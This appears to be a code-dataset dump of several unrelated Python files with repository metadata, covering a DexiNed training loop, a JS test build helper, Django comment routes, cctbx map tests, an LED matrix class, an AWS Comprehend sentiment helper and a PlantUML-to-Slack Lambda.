training_dir = os.path.join(args.output_dir,args.train_data)
os.makedirs(training_dir,exist_ok=True)
checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
if args.tensorboard and not args.is_testing:
# from tensorboardX import SummaryWriter # previous torch version
from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greater
tb_writer = SummaryWriter(log_dir=training_dir)
# Get computing device
device = torch.device('cpu' if torch.cuda.device_count() == 0
else 'cuda')
# Instantiate model and move it to the computing device
model = DexiNed().to(device)
# model = nn.DataParallel(model)
ini_epoch =0
if not args.is_testing:
if args.resume:
ini_epoch=17
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
dataset_train = BipedDataset(args.input_dir,
img_width=args.img_width,
img_height=args.img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
train_mode='train',
arg=args
)
dataloader_train = DataLoader(dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers)
dataset_val = TestDataset(args.input_val_dir,
test_data=args.test_data,
img_width=args.test_img_width,
img_height=args.test_img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
test_list=args.test_list, arg=args
)
dataloader_val = DataLoader(dataset_val,
batch_size=1,
shuffle=False,
num_workers=args.workers)
# Testing
if args.is_testing:
output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
print(f"output_dir: {output_dir}")
if args.double_img:
# predict twice an image changing channels, then mix those results
testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
else:
test(checkpoint_path, dataloader_val, model, device, output_dir, args)
return
criterion = bdcn_loss2
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.wd)
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
# Main training loop
seed=1021
for epoch in range(ini_epoch,args.epochs):
if epoch%7==0:
seed = seed+1000
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
print("------ Random seed applied-------------")
# Create output directories
output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
os.makedirs(output_dir_epoch,exist_ok=True)
os.makedirs(img_test_dir,exist_ok=True)
train_one_epoch(epoch,
dataloader_train,
model,
criterion,
optimizer,
device,
args.log_interval_vis,
tb_writer,
args=args)
validate_one_epoch(epoch,
dataloader_val,
model,
device,
img_test_dir,
arg=args)
# Save model after end of every epoch
torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
args = parse_args()
main(args)
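The training loop above applies deep supervision: every intermediate DexiNed output is scored and the total loss is a weighted sum, sum(criterion(pred, labels, w) / batch_size for pred, w in zip(preds_list, l_weight)). A small framework-free sketch of that aggregation with a stand-in criterion (the shapes, weights, and toy loss are illustrative assumptions, not bdcn_loss2):

import numpy as np

def toy_criterion(pred, label, weight):
    # Stand-in for the real edge loss: weighted mean squared error on the maps.
    return weight * float(np.mean((pred - label) ** 2))

batch_size = 8
labels = np.random.rand(batch_size, 1, 16, 16)
preds_list = [np.random.rand(batch_size, 1, 16, 16) for _ in range(7)]   # 7 side outputs
l_weight = [0.7, 0.7, 1.1, 1.1, 0.3, 0.3, 1.3]                           # same weighting idea as above

loss = sum(toy_criterion(p, labels, w) / batch_size for p, w in zip(preds_list, l_weight))
print(loss)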
| 42.406321
| 121
| 0.524806
| 2,107
| 18,786
| 4.475083
| 0.170859
| 0.026726
| 0.050483
| 0.01209
| 0.42645
| 0.370877
| 0.322304
| 0.303001
| 0.285396
| 0.252731
| 0
| 0.026567
| 0.370861
| 18,786
| 442
| 122
| 42.502262
| 0.771216
| 0.103535
| 0
| 0.340058
| 0
| 0
| 0.131715
| 0.00161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017291
| false
| 0
| 0.037464
| 0
| 0.060519
| 0.048991
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe62800d500daa91f541e4f0b0257370caac7c78
| 5,905
|
py
|
Python
|
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | null | null | null |
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | null | null | null |
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | 1
|
2021-09-13T12:03:37.000Z
|
2021-09-13T12:03:37.000Z
|
#!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
class PretreatTargets(object):
def __init__(self, target_list):
self.path_list = []
self.name_list = []
self.target_list = target_list
def pretreat_targets_from_list(self):
path_list, name_list = self._parse_target_info()
self._pretreat_by_target_name(path_list, name_list)
def disassemble_targets_from_list(self):
self._disassemble_by_target_name(self.path_list, self.name_list)
def _parse_target_info(self):
path_list = []
name_list = []
for line in self.target_list:
path = line.split(':')[0][2:]
name = line.split(':')[1].split('(')[0]
path_list.append(path)
name_list.append(name)
return path_list, name_list
def _pretreat_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
if name.endswith("JsTest"):
if self._pretreat_js_target(path, name):
self.path_list.append(path)
self.name_list.append(name)
LOG.info("js test %s pretreat success" % name)
def _pretreat_js_target(self, path, name):
template_path = os.path.join(sys.framework_root_dir, "libs",
"js_template", "src")
target_path = os.path.join(sys.source_code_root_path, path)
config_path = os.path.join(target_path, "config.json")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
test_path = os.path.join(target_path, "src", "main", "js",
"default", "test")
if not os.path.exists(config_path):
LOG.error("js test needs config.json file")
return False
if not os.path.exists(gn_path):
LOG.error("js test needs BUILD.gn file")
return False
LOG.info("target_path: %s" % target_path)
#modify BUILD.gn file to compile hap
output_path = self._parse_output_path_in_gn(gn_path)
if output_path == "":
LOG.error(" BUILD.gn needs 'module_output_path'")
return
os.rename(gn_path, gn_bak_path)
template_args = {'output_path': output_path, 'suite_name': name}
with open(gn_path, 'w') as filehandle:
filehandle.write(JsTestConst.BUILD_GN_FILE_TEMPLATE %
template_args)
#copy js hap template to target path
shutil.copytree(template_path, os.path.join(target_path, "src"))
shutil.copy(config_path, os.path.join(target_path, "src", "main"))
file_name = os.listdir(target_path)
for file in file_name:
if file.endswith(".js"):
LOG.info("file: %s" % file)
shutil.copy(os.path.join(target_path, file), test_path)
with open(os.path.join(test_path, "List.test.js"), 'a') \
as list_data:
list_data.write("require('./%s')" % file)
#modify i18n json file
i18n_path = os.path.join(target_path, "src", "main", "js",
"default", "i18n", "en-US.json")
json_data = ""
with open(i18n_path, 'r') as i18n_file:
lines = i18n_file.readlines()
for line in lines:
if "TargetName" in line:
line = line.replace("TargetName", name)
json_data += line
with open(i18n_path, 'w') as i18n_file:
i18n_file.write(json_data)
return True
def _parse_output_path_in_gn(self, gn_path):
output_path = ""
with open(gn_path, 'r') as gn_file:
for line in gn_file.readlines():
if line.startswith("module_output_path"):
output_path = line.split()[2].strip('"')
break
return output_path
def _disassemble_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
LOG.info("name: %s path: %s" % (name, path))
if name.endswith("JsTest"):
self._disassemble_js_target(path, name)
LOG.info("js test %s disassemble success" % name)
def _disassemble_js_target(self, path, name):
target_path = os.path.join(sys.source_code_root_path, path)
src_path = os.path.join(target_path, "src")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
if os.path.exists(src_path):
shutil.rmtree(src_path)
if os.path.exists(gn_path) and os.path.exists(gn_bak_path):
os.remove(gn_path)
os.rename(gn_bak_path, gn_path)
##############################################################################
##############################################################################
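# A minimal usage sketch, not part of the original module: it assumes the
# harness has already set sys.framework_root_dir and sys.source_code_root_path,
# and that every target line follows the "//path/to/target:NameJsTest(...)"
# form expected by _parse_target_info.
targets = [
    "//test/example:ExampleJsTest(//test/example:ExampleJsTest)",
]
pretreater = PretreatTargets(targets)
pretreater.pretreat_targets_from_list()     # generate hap sources and a templated BUILD.gn
# ... build and run the JS tests here ...
pretreater.disassemble_targets_from_list()  # restore the original BUILD.gn and remove src/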
| 39.366667
| 78
| 0.573412
| 746
| 5,905
| 4.30563
| 0.219839
| 0.03736
| 0.0467
| 0.056663
| 0.307908
| 0.232254
| 0.188356
| 0.146015
| 0.136364
| 0.136364
| 0
| 0.007667
| 0.271126
| 5,905
| 149
| 79
| 39.630872
| 0.738615
| 0.11685
| 0
| 0.115385
| 0
| 0
| 0.089885
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086538
| false
| 0
| 0.057692
| 0
| 0.211538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe63a253f1cf19a404c6e2b601535edfb1888800
| 657
|
py
|
Python
|
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | 1
|
2018-05-29T08:43:57.000Z
|
2018-05-29T08:43:57.000Z
|
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | null | null | null |
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | 1
|
2018-08-25T01:38:12.000Z
|
2018-08-25T01:38:12.000Z
|
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
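# A hedged sketch, not part of the original test app: patterns() and string
# view references were removed in later Django releases, so on Django >= 2.0
# the same routes would typically be declared as a plain list with re_path(),
# reusing the views and LatestCommentFeed imported above.
from django.urls import re_path
from django.contrib.contenttypes.views import shortcut

urlpatterns = [
    re_path(r'^post/$', views.custom_submit_comment),
    re_path(r'^flag/(\d+)/$', views.custom_flag_comment),
    re_path(r'^delete/(\d+)/$', views.custom_delete_comment),
    re_path(r'^approve/(\d+)/$', views.custom_approve_comment),
    re_path(r'^cr/(\d+)/(.+)/$', shortcut, name='comments-url-redirect'),
    re_path(r'^rss/comments/$', LatestCommentFeed()),
]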
| 26.28
| 105
| 0.692542
| 78
| 657
| 5.641026
| 0.384615
| 0.045455
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121766
| 657
| 24
| 106
| 27.375
| 0.762565
| 0
| 0
| 0
| 0
| 0
| 0.232877
| 0.09589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.235294
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe646aafd2f602c63f8aacb84f51c78795b63990
| 7,537
|
py
|
Python
|
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
if (1):
random.seed(0)
flex.set_random_seed(0)
def get_xrs():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,10,10,90,90,90),
space_group_symbol="P 1")
return xray.structure(
crystal_symmetry=crystal_symmetry,
scatterers=flex.xray_scatterer([
xray.scatterer(label="C", site=(0,0,0))]))
def get_map(xrs, d_min=1.):
f_calc = xrs.structure_factors(d_min=d_min).f_calc()
fft_map = f_calc.fft_map()
fft_map.apply_sigma_scaling()
return fft_map.real_map_unpadded(), f_calc
def exercise_00():
"""
Exercise maptbx.target_and_gradients_diffmap .
"""
xrs = get_xrs()
map_data, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_data,
step = 0.3,
sites_frac = xrs.sites_frac())
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
assert approx_equal(tg.target(), 0)
assert approx_equal(list(tg.gradients()), [[0,0,0]])
xrs = xrs.translate(x=0.3, y=-0.5, z=0.7)
assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]])
map_current, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_current,
step = 0.3,
sites_frac = xrs.sites_frac())
assert tg.target() > 0
for g in tg.gradients():
for g_ in g:
assert abs(g_)>0.
def exercise_01(d_min=1.0):
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization.
"""
xrs = get_xrs()
map_target, f_calc = get_map(xrs=xrs)
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
for sx in [-1,0,1]:
for sy in [-1,0,1]:
for sz in [-1,0,1]:
xrs_cp = xrs.deep_copy_scatterers()
xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
crystal_gridding = maptbx.crystal_gridding(
unit_cell = xrs_cp.unit_cell(),
space_group_info = xrs_cp.space_group_info(),
pre_determined_n_real = map_target.accessor().all())
o = minimization.run(
xray_structure = xrs_cp,
miller_array = f_calc,
crystal_gridding = crystal_gridding,
map_target = map_target,
step = d_min/4,
target_type = "diffmap")
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error>0.7
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
for step in [miller_array.d_min()/4]*5:
minimized = minimization.run(
xray_structure = xrs_sh,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = step,
geometry_restraints_manager = None,
target_type = "diffmap")
xrs_sh = minimized.xray_structure
map_current = minimized.map_current
final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
assert approx_equal(start_error, 0.8, 1.e-3)
assert final_error < 1.e-4
def exercise_03():
"""
Exercise maptbx.target_and_gradients_simple.
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
#
t1 = maptbx.real_space_target_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
selection = flex.bool(xrs_sh.scatterers().size(), True))
g1 = maptbx.real_space_gradients_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
o = maptbx.target_and_gradients_simple(
unit_cell = xrs.unit_cell(),
map_target = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
assert approx_equal(t1, o.target())
for gi,gj in zip(g1, o.gradients()):
assert approx_equal(gi, gj)
def exercise_04():
"""
Exercise maptbx.target_and_gradients_simple in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1., resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 150)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.3)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error > 0.29
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
xrs_sh_ = xrs_sh.deep_copy_scatterers()
minimized = minimization.run(
xray_structure = xrs_sh_,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = 0.5,
geometry_restraints_manager = None,
target_type = "simple")
xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
final_error = flex.mean(xrs.distances(other = xrs_sh_))
assert final_error < 0.015
if (__name__ == "__main__"):
exercise_00()
exercise_01()
exercise_02()
exercise_03()
exercise_04()
| 36.235577
| 80
| 0.667109
| 1,089
| 7,537
| 4.277319
| 0.146924
| 0.025762
| 0.036496
| 0.041219
| 0.681408
| 0.653499
| 0.608416
| 0.588235
| 0.563332
| 0.5
| 0
| 0.031118
| 0.21547
| 7,537
| 207
| 81
| 36.410628
| 0.756638
| 0.043784
| 0
| 0.502793
| 0
| 0
| 0.009516
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 1
| 0.055866
| false
| 0
| 0.055866
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe66e2796ab20353c3b7dbe7a834d55cb22ebb8a
| 1,212
|
py
|
Python
|
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | 2
|
2022-01-17T17:22:01.000Z
|
2022-01-22T13:11:33.000Z
|
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | null | null | null |
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | null | null | null |
""" LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
class Matrix(list):
def __init__(self, source=None) -> None:
if source is None:
row_iter = ([off for _ in range(8)] for _ in range(8))
elif isinstance(source, list):
row_iter = (list(row) for row in source)
else:
raise TypeError('Unknown source to build a Matrix from')
super().__init__(row_iter)
def background(self, color: Color) -> None:
for i in range(8):
for j in range(8):
self[i][j] = color
def character(self, char: str, char_color: Color = on, *, x_offset: int = 1) -> None:
if x_offset <= -8 or x_offset >= 8:
return
if len(char) > 1:
char = char[0]
if not char:
char = ' '
if char < ' ' or char > '\x7f':
char = '\x7f'
bitmap = font_6x8[ord(char) - 32]
for i, row in enumerate(bitmap):
for j, c in enumerate(row):
if c != ' ':
x = x_offset + j
if 0 <= x < 8:
self[i][x] = char_color
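# A short usage sketch, not part of the original module, using the `on` and
# `off` colors imported at the top of the file.
matrix = Matrix()          # 8x8 grid, every pixel initialised to `off`
matrix.background(off)     # explicitly clear the background
matrix.character('A', on)  # draw 'A' with the default 1-pixel x offset
for row in matrix:
    print(row)             # Matrix subclasses list, so rows iterate directly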
| 26.347826
| 89
| 0.487624
| 159
| 1,212
| 3.559748
| 0.36478
| 0.04947
| 0.056537
| 0.038869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02578
| 0.391914
| 1,212
| 45
| 90
| 26.933333
| 0.742198
| 0.008251
| 0
| 0
| 0
| 0
| 0.045226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0.0625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe68679524344d1cb6b9cfd2e5daf3c7c5e16099
| 1,704
|
py
|
Python
|
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
"""Get sentiment.
Inspects text and returns an inference of the prevailing sentiment
(positive, neutral, mixed, or negative).
Args:
text: UTF-8 text string. Each string must contain fewer than
5,000 bytes of UTF-8 encoded characters (required | type: str).
language_code: language of text (not required | type: str |
default: 'en').
Returns:
sentiment: positive, neutral, mixed, or negative
(type: str).
"""
def prepare_text(text):
while len(bytes(text, 'utf-8')) > 4999:
text = text[:-1]
return text
comprehend = boto3.client('comprehend')
text = prepare_text(text)
try:
r = comprehend.detect_sentiment(Text=text, LanguageCode=language_code)
except Exception as e:
raise e
sentiment = r['Sentiment'].lower()
return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
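# A short usage sketch, not part of the original module: it requires AWS
# credentials with Comprehend access to be configured for boto3.
if __name__ == "__main__":
    print(get_sentiment("It was great quality.", language_code="en"))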
| 32.150943
| 78
| 0.6473
| 242
| 1,704
| 4.528926
| 0.450413
| 0.027372
| 0.029197
| 0.05292
| 0.432482
| 0.432482
| 0.361314
| 0.361314
| 0.361314
| 0.361314
| 0
| 0.014354
| 0.264085
| 1,704
| 52
| 79
| 32.769231
| 0.859649
| 0.687793
| 0
| 0
| 0
| 0
| 0.059957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.071429
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6923b1aa562920cf3b40c7be4c7dd797b7d3f4
| 1,039
|
py
|
Python
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 3
|
2018-12-14T15:43:46.000Z
|
2019-04-25T07:44:58.000Z
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 1
|
2019-05-11T14:19:37.000Z
|
2019-05-11T14:51:04.000Z
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 4
|
2018-12-27T04:54:14.000Z
|
2019-05-11T14:07:47.000Z
|
import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
def upload_png_file(channel_id, file):
bot_token = Secrets('slack-gs-bot').value()
my_file = {
'file': ('/tmp/myfile.png', open(file, 'rb'), 'png')
}
payload = {
"filename" : 'image.png',
"token" : bot_token,
"channels" : [channel_id],
}
requests.post("https://slack.com/api/files.upload", params=payload, files=my_file)
return 'image sent .... '
def run(event, context):
channel = event['channel']
puml = event['puml']
puml = puml.replace('&lt;', '<').replace('&gt;', '>')  # decode HTML-escaped angle brackets
(fd, tmp_file) = tempfile.mkstemp('.png')
puml_to_png = Lambdas('utils.puml_to_png').invoke
result = puml_to_png({"puml": puml })
with open(tmp_file, "wb") as fh:
fh.write(base64.decodebytes(result['png_base64'].encode()))
return upload_png_file(channel, tmp_file)
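# A hedged sketch of the event payload run() expects, not part of the original
# module; the channel id below is a placeholder, not a real identifier.
example_event = {
    "channel": "C0123456789",
    "puml": "@startuml\nAlice -> Bob: hello\n@enduml",
}
# run(example_event, None) would render the diagram through the
# 'utils.puml_to_png' Lambda and upload the resulting PNG to that channel.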
| 28.081081
| 86
| 0.589028
| 128
| 1,039
| 4.609375
| 0.460938
| 0.040678
| 0.045763
| 0.054237
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007722
| 0.252166
| 1,039
| 36
| 87
| 28.861111
| 0.751609
| 0
| 0
| 0
| 0
| 0
| 0.167469
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.185185
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe694e90c7ac984d467776f89ad0bcfbd5ee4819
| 2,131
|
py
|
Python
|
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
